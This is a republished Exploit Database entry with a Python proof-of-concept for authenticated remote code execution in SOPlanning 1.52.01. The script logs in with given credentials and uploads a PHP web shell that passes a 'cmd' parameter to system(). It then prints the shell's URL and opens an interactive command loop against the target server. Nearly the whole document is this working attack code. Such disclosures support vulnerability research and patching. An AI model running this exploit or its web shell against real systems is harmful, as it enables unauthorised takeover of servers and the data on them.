SOPlanning 1.52.01 (Simple Online Planning Tool) – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 158 阅读

• 作者： cybersploit
  日期： 2024-11-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52082/

• # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
  # Date: 6th October, 2024
  # Exploit Author: Ardayfio Samuel Nii Aryee
  # Version: 1.52.01 
  # Tested on: Ubuntu
  
  import argparse
  import requests
  import random
  import string
  import urllib.parse
  
  def command_shell(exploit_url):
  commands = input("soplaning:~$ ")
  encoded_command = urllib.parse.quote_plus(commands)
  
  command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
  if command_res.status_code == 200:
  print(f"{command_res.text}")
  return
  print(f"Error: An erros occured while running command: {encoded_command}")
  
  def exploit(username, password, url):
  target_url = f"{url}/process/login.php"
  upload_url = f"{url}/process/upload.php"
  link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
  php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"
  
  login_data = {"login":username,"password":password}
  res = requests.post(target_url, data=login_data, allow_redirects=False)
  
  cookies = res.cookies
  
  multipart_form_data = {
  "linkid": link_id,
  "periodeid": 0,
  "fichiers": php_filename,
  "type": "upload"
  }
  
  web_shell = "<?php system($_GET['cmd']); ?>"
  
  files = {
  'fichier-0': (php_filename, web_shell, 'application/x-php')
  }
  upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)
  
  if upload_res.status_code == 200 and "File" in upload_res.text:
  print(f"[+] Uploaded ===> {upload_res.text}")
  print("[+] Exploit completed.")
  exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
  print(f"Access webshell here: {exploit_url}?cmd=<command>")
  
  if "yes" == input("Do you want an interactive shell? (yes/no) "):
  try:
  while True:
  command_shell(exploit_url)
  except Exception as e:
  raise(f"Error: {e}")
  else:
  pass
  
  
  def main():
  parser = argparse.ArgumentParser(prog="SOplanning RCE", \
  usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")
  
  parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
  parser.add_argument("-u", "--username",type=str,help="username", required=True)
  parser.add_argument("-p", "--password",type=str,help="password", required=True)
  
  args = parser.parse_args()
  
  exploit(args.username, args.password, args.target)
  
  main()